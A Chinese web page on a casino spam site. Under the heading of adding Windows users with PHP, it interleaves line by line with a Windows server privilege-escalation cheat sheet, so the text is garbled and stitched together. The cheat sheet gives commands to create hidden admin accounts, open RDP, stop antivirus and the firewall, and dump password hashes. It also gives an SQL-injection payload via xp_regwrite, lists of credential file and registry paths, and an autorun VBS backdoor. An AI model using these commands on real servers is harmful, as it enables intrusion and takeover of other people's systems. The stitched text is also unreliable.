澳门新莆京手机网站-新蒲京娱乐场 > 书籍 > 怎么行使PHP往windows中加上客户

怎么行使PHP往windows中加上客户

办法有朝气蓬勃:  

【 web提权 】

先是看三个 二〇〇二 的系统。

因为拉长客商,所以您运转PHP程序的客户必得是管理员权限(Administrator卡塔尔(قطر‎,而且同期必要您的php.ini中的安全形式尚未展开,而且关闭函数中绝非关闭system(State of Qatar、exec(卡塔尔、passthru(State of Qatar等函数。  

1.能还是无法施行cmd就看这一个命令:net user,net不行就用net1,再不行就上传三个net到可写可读目录,推行/c c:windowstempcookiesnet1.exe user

二零零三 的系统和 2002的相比较,安全质量要差点,不过那并不表达提权就轻松超级多,有的时候候管理员把一些东西禁止使用掉了 ,我们还得 留意深入分析。

( 以下表明针对Windows二〇〇〇/Windows XP/Windows 二〇〇二 卡塔尔(قطر‎  
一、使用IIS做Web服务器  
只即使应用IIS做服务器来讲,那么运维PHP的帐户就是:IUS悍马H2_XXXXXXXX,IWAM_XXXXXXX,(XXXX代表服务器的Computer名State of Qatar,那么你必得把那四个客户加到管理员组:Administrators 。当然,你如此做的话,会给服务器安全拉动威迫。  

2.当提权成功,3389没开的图景下,上盛传3389的vps没成功时,试试上传rootkit.asp 用刚提权的客商登陆进去就是system权限,再尝试平常就能够了。

1、跳转到听而不闻目录,提权

二、使用Apache作为Web服务器  
据明白,Apache安装成服务之后,那么就是以system权限运行的,那么正是PHP运转以来,直接正是系统权限,已经超(Jing Chao卡塔尔过了组织者权限,那么推行命令更不再话下。如果你改改了Apache的周转客户,那么您必须要内定Apache服务运营顾客是组织者以上权限,比如Administor只怕system权限。  
下一场您就足以在您的PHP代码中施行加多客商操作了:  
陈说如下代码:  

3.cmd闭门羹访问的话就和睦上传三个cmd.exe 自个儿上传的后缀是不节制后缀的,cmd.exe/cmd.com/cmd.txt 都足以。

C:Documents and SettingsAll Users 「开始」菜单 程序

<?php  
define("USER_GROUP", "users"卡塔尔国; //客商组,默感到users,为了安全,定义仍旧的客户组  
define("ACTIVE", "YES"卡塔尔国; //是或不是创立后直接激活客商,YES为激活,NO为不激活  

4.cmd命令:systeminfo,看看有没有KB95二零零零、KB956572、KB970483那四个补丁,若无,第三个是pr提权,首个是巴西烤肉提权,第三个是iis6.0提权。

看这里能还是不可能跳转,大家从此间能够拿走许多有效的消息例如 Serv-U 的渠道,

//从数据库提取顾客名和密码  
//借使表为user_info,并且唯有字段id, user, passwod  
$sql = "SELECT user,password FROM user_info";  
$result = mysql_query($sql) or die("Query database failed");  
//循环插入客户  
while ($array = mysql_fetch_array($result)) {  
if (!function_exists("system"))  
die('Function system() not exists, add user failed.');  
//增多客户  
@system("net user $array[user] $array[passwd] /active:ACTIVE /add");  
//增加到钦命组  
@system("net localgroup users $array[user] /del");  
@system("net localgroup USER_GROUP $array[user] /add");  
}  
?> 

6.c:windowstempcookies 那么些目录

c:Program Filesserv-u

如上代码达成了把您具备数据库的顾客增加到本地系统,假如你想单个的增进,能够考虑退换成顾客注册成功后就拉长顾客,这么些可以团结扩充。  

7.找sa密码或是root密码,直接利用马来西亚的公文搜索作用一贯寻找,超方便!

C:WINNTsystem32config

而是,此格局不能够促成同步  

8.cmd实施exp没回显的缓和措施:com路线这里输入exp路径C:RECYCLERpr.exe,命令这里清空(满含/c 卡塔尔(قطر‎输入"net user jianmei daxia /add"

下它的 SAM,破解密码

方法二:  
能够在劳务器端利用php.exe来实行,并且不会有安全题材。  

9.充实客商并进步为大班权限之后,假使三番一遍不上3389,上传rootkit.asp脚本,访谈会提示登陆,用提权成功的账号密码登录进去就足以享有管理员权限了。

c:winntsystem32inetsrvdata

假若你的php安装在c:php中,那么我们就利用命令提示符的来推行php脚本来增加顾客。  

10.不常相当监察和控制不让增添客商,能够尝尝抓处理哈希值,上传“PwDump7 破解当前保管密码(hash值卡塔尔(قطر‎”,俩个都上传,实践PwDump7.exe就足以了,之后到网址去解密就能够。

是 erveryone 完全调整,超多时候没作限定,把进步权限的工具上传上去,然后实行

PHP代码:  
//c:test.php  
<?php  
@system("net user test test /add");  
?>  
保存在c:test.php文件中  
在cmd下执行:  
c:phpphp.exe c:test.php  
提示:  
C:>c:phpphp.exe c:test.php  
一声令下成功做到。  

11.偶发扩张不上客商,有一点都不小恐怕是密码过于简短或是过于复杂,还也可能有正是杀软的掣肘,命令 tasklist 查看进程

c:prel

再将艺术一中的这段代码得到那边来推行,然后php.exe当做shell脚本引擎。然后写成批管理,通过准时职务来推行。当然,也得以思忖采用任何语言来促成,例如vb/vc之类的,依期去数据库中搜寻是或不是有新加上的客户,然后再把客户增进到系统中。

12.其实星外提权只要一个可施行的公文就可以,先运营叁回cmd,之后把星外ee.exe命名叫log.csv 就可以进行了。

C:Program FilesJava Web Start

13.用wt.asp扫出来的目录,此中深天青的文书能够轮流到exp,实践命令时cmd这里输入替换的文本路线,下边清空双引号加增添客户的命令。

c:Documents and Settings

14.提权非常不得已的时候,能够尝试TV远控,通杀内外网,穿透防火墙,很刚劲的。

C:Documents and SettingsAll Users

15.当可读可写目录存在空格的时候,会并发如此的动静:'C:Documents' 不是在那之中或外界命令,亦非可运维的次第 或批管理公事。解决办法是应用菜刀的交互作用shell切换来exp路线,如:Cd C:Documents and SettingsAll UsersApplication DataMicrosoft 目录
下一场再实行exp大概cmd,就不会存在上边的境况了,aspshell平时是回天无力跳转目录的~

c:winntsystem32inetsrvdata

16.有时候能够增加顾客,然则增多不到管理组,有异常的大希望是administrators改名了,net user administrator 看下当地组成员,*administrators

c:Program Files

17.走入服务器,能够世袭内网渗透 那时能够品味张开路由器 暗许帐号密码 admin admin

c:Program Filesserv-u

18.有的cmd推行很失常,asp马里,cmd路线填上面,上面填:""c:xxxexp.exe "whoami" 记得后边加五个双引号,不行后边也四个,不行就把exp的渠道放在cmd这里,上边不改变。

C:Program FilesMicrosoft SQL Server

19.日常增加不上客户,或是想增添扩大顾客的vbs,bat,远控小马到服务器的起步项里,用“直接使服务器蓝屏重启的东东”这么些工具得以达成,

c:Temp

20.履行PwDump7.exe抓哈希值的时候,建议重定向结果到保存为1.txt /c c:windowstempcookiesPwDump7.exe >1.txt

c:mysql

21.菜刀实践的技能,上传cmd到可实践目录,右击cmd 设想终端,help 然后setp c:windowstempcmd.exe 设置极端路线为:c:windowstempcmd.exe

c:PHP

22.当不帮助aspx,或是援助但跨不了目录的时候,能够上传二个读iis的vps,推行命令列出全数网址目录,找到主站的目录就可以跨过去了。
上传cscript.exe到可举行目录,接着上传iispwd.vbs到网址根目录,cmd命令/c "c:windowstempcookiescscript.exe" d:webiispwd.vbs

2、SU 提权 // 最有效

23.怎么样辨别服务器是否内网? 192.168.x.x 172.16.x.x 10.x.x.x

一贯用提权了,这些非常的少说了,太多了

(( dos命令大全 卡塔尔(قطر‎卡塔尔(قطر‎

下一场能够平素运用上边包车型地铁下令校正磁盘的采访调控

查阅版本:ver

cacls.exe c: /e /t /g everyone:F # 把 c 盘设置为 everyone 可以浏览

查阅权限:whoami

cacls.exe d: /e /t /g everyone:F    # 把 d 盘设置为 everyone 能够浏览

查看配置:systeminfo

cacls.exe e: /e /t /g everyone:F # 把 e 盘设置为 everyone 能够浏览

查看客户:net user

cacls.exe f: /e /t /g everyone:F # 把 f 盘设置为 everyone 能够浏览

查看进度:tasklist

F:safe 溢出工具 sqlhello2>cacls

查看正在运营的服务:tasklist /svc

显示只怕改革文件的访谈调控表 (ACL卡塔尔国

翻看开放的具备端口:netstat -ano

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]

询问管理客商名:query user

[/P user:perm [...]] [/D user [...]]

查阅搭建遇到:ftp 127.0.0.1

filename 显示 ACL。

翻开钦命服务的路子:sc qc Mysql

/T 校正当前目录及其全数子目录中

累积三个客商:net user jianmei daxia.asd /add

钦点文件的 ACL。

进级四管理权限:net localgroup administrators jianmei /add

/E 编辑 ACL 而不替换。

加上顾客并提高权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add

/C 在产出回绝访谈错误时继续。

翻开制订顾客音信:net user jianmei

/G user:perm 授予钦赐客商访谈权限。

翻看全部管理权限的客户:net localgroup administrators

Perm 可以是 : R 读取

参与远程桌面客商组:net localgroup "Remote Desktop Users" jianmei /add

W 写入

突破最明斯克接数:mstsc /admin /v:127.0.0.1

C 更改 ( 写入 )

剔除客户:net user jianmei /del

F 完全调控

删除管理员账户:net user administrator daxia.asd

/路虎极光 user 撤除钦命客商的访谈权限 ( 仅在与 /E 一同使用时合法 卡塔尔(قطر‎。

改换系统登入密码:net password daxia.asd

/P user:perm 替换钦定客商的拜候权限。

激活GUEST用户:net user guest /active:yes

Perm 可以是 : N 无

开启TELNET服务:net start telnet

R 读取

闭馆麦咖啡:net stop "McAfee McShield"

W 写入

关门防火墙:net stop sharedaccess

C 更改 ( 写入 )

翻看当前目录的享有文件:dir c:windows

F 完全调节

查阅制订文件的原委:type c:windows1.asp

/D user 谢绝钦点客商的寻访。

把cmd.exe复制到c:windows的temp目录下并取名字为cmd.txt:copy c:新蒲京娱乐场,windowstempcookiescmd.exe c:windowstempcmd.txt

在命令中能够使用通配符钦点八个公文。

开3389端口的下令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

3、PCANYWHERE 提权 // 最有功效

翻看补丁:dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt

C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere

(( SQL语句直接打开3389 卡塔尔(قطر‎卡塔尔国

看是或不是跳转到那么些目录,倘若行那就最棒了,间接下它的 CIF 文件,破解得到pcAnywhere 密码,登录

3389登录关键注册表地点:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections

4、PHP,ASP.NET 提权 // 最有功效

个中键值DenyTSConnections 直接决定着3389的打开和关闭,当该键值为0意味着3389敞开,1则意味关闭。

突发性,服务器还辅助 PHP/ASP.NET 等,所以上个 PHP/ASPX 马,有可能就获得系统权限了,PHP/ASPX 的暗中同意权限都比 ASP 高,所以是值得推荐的。作者有一回在凌犯叁个站,把具备的可用方法都试过了,不行,后来上了个 ASPX 马,居然是以 SYSTEM 权限运行的,小编纵情的欢喜……

而MSSQL的xp_regwrite的存款和储蓄进程能够对注册举行改变,大家使用这一点就可以大概的改变DenyTSConnections键值,进而调控3389的关闭和开启。

5、FLASHXP

开启3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;--

将 Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak 多少个文本下载到小编的计算机中替换了本身计算机中 flashfxp 文件夹的应和文件。张开flashfxp 在站点中开垦站点微机豆蔻梢头项,对方管理员通过 flashfxp 连接的逐一站点都在,能够连绵不断一下,然后有嗅探器获得密码……

澳门新莆京手机网站,关闭3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',1;--

6、试行脚本提权

(( 不足为怪杀软 卡塔尔State of Qatar

能够试下在 c:Documents and SettingsAll Users 「开始」菜单 程序 启动 " 写入 bat,vbs 等木马。

360tray.exe 360实时爱护

运行 "cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps" 来进步权限

ZhuDongFangYu.exe 360积极性防守

7、写如运营项提权 /AUTORUN.INF

KSafeTray.exe 金山亲兵

autorun.ini 加 SHELL.VBS

McAfee McShield.exe 麦咖啡

autorun.inf

SafeDogUpdateCenter.exe 服务器安全狗

[autorun]

(( windows提权中趁机目录和机智注册表的使用 卡塔尔State of Qatar

open=shell.vbs

机敏目录 目录权限 提权用场

shell.vbs

C:Program Files 暗许顾客组users对该目录具有查看权 能够查阅服务器安装的行使软件
C:Documents and SettingsAll Users「开始」菜单次第 Everyone具有查看权限 寄存快速方式,能够下载文件,属性查看安装路线
C:Documents and SettingsAll UsersDocuments Everyone完全调节权限 上传实践cmd及exp
C:windowssystem32inetsrv 伊芙ryone完全调控权限 上传实施cmd及exp
C:windowsmy.iniC:Program FilesMySQLMySQL Server 5.0my.ini 暗中认可客商组users具有查看权限 安装mysql时会将root密码写入该文件
C:windowssystem32 私下认可客户组users具备查看权限 Shift后门经常是在该文件夹,能够下载后门破解密码
C:Documents and SettingsAll Users「开始」菜单程序起步 伊芙ryone具有查看权限 能够品尝向该目录写入vbs或bat,服务珍视启后运营。
C:RECYCLERD:RECYCLER 伊芙ryone完全调控权限 回笼站目录。常用于实践cmd及exp
C:Program FilesMicrosoft SQL Server 默许客商组users对该目录具有查看权限 搜集mssql相关消息,偶尔候该目录也设有可进行权限
C:Program FilesMySQL 暗中同意客户组users对该目录具有查看权限 找到MYSQL目录中user.MYD里的root密码
C:oraclexe 暗中同意客户组users对该目录具有查看权限 能够尝试使用Oracle的私下认可账户提权
C:WINDOWSsystem32config 私下认可客商组users对该目录具备查看权限 尝试下载sam文件实行破解提权
C:Program FilesGeme6 FTP ServerRemote AdminRemote.ini 私下认可客商组users对该目录具有查看权限 Remote.ini文件中寄放着G6FTP的密码
c:Program FilesRhinoSoft.comServ-Uc:Program FilesServ-U 暗许客商组users对该目录具有查看权限 ServUDaemon.ini 中存款和储蓄了设想主机网址路线和密码
c:windowssystem32inetsrvMetaBase.xml 默许客户组users对该目录具备查看权限 IIS配置文件
C:tomcat5.0confresin.conf 暗中同意客户组users对该目录具备查看权限 汤姆at寄存密码的岗位
C:ZKEYSSetup.ini 暗中同意客商组users对该目录具有查看权限 ZKEYS虚构主机贮存密码的岗位

dim wsh

(( 提权中的敏感注册表地方 卡塔尔(قطر‎卡塔尔国

set wsh=CreateObject("WScript.Shell")

HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerMSSQLServerSuperSocketNetLibTcp Mssql端口
HKLMSYSTEMCurrentControlSetControlTerminal Server DenyTSConnections 远程终端 值为0 即为开启
HKEY_LOCAL_MACHINESOFTWAREMySQL AB mssql的注册表地点
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 华众主机注册表配置地点
HKEY_LOCAL_MACHINESOFTWARECat SoftServ-UDomains1UserList serv-u的顾客及密码(su加密)地点
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer WinStations陆风X8DP-Tcp 在该注册表地方PortNumber的值即位3389端口值
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers mysql处理工科具Navicat的注册表地点,提权运用请谷歌(Google卡塔尔
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters Radmin的安插文件,提权中常将其导出实行扩充覆盖提权
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots IIS注册表全版本泄漏客户路线和FTP顾客名漏洞
HKEY_LOCAL_MACHINEsoftwarehzhostconfigSettingsmastersvrpass 华众主机在注册表中保留的mssql、mysql等密码
HKEY_LOCAL_MACHINESYSTEMLIWEIWENSOFTINSTALLFREEADMIN11 星外主机mssql的sa账号密码,双MD5加密
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual RootsControlSet002 星外ftp的注册表地点,当然也席卷ControlSet001、ControlSet003

wsh.run "net user guest /active:yes",0

(( wscript.shell的去除和回复 State of Qatar卡塔尔(قطر‎

wsh.run "net user guest 520ls",0

载wscript.shell对象,在cmd下或直接运维:regsvr32 /u %windir%system32WSHom.Ocx

wsh.run "net localgroup administrators guest /add",0

卸载FSO对象,在cmd下或直接运营:regsvr32.exe /u %windir%system32scrrun.dll

wsh.run "net user hkbme 520ls /add",0

卸载stream对象,在cmd下或直接运营:regsvr32 /s /u “C:ProgramFilesCommonFilesSystemadomsado15.dll”

wsh.run "net localgroup administrators tlm /add",0

如果想重操旧业的话只须要去掉/U 就可以再一次再登记以上有关ASP组件,那样子就足以用了

wsh.run "cmd.exe /c del autorun.inf",0

Copyright © 2015-2019 http://www.carrefourstation.com. 澳门新莆京手机网站-新蒲京娱乐场有限公司 版权所有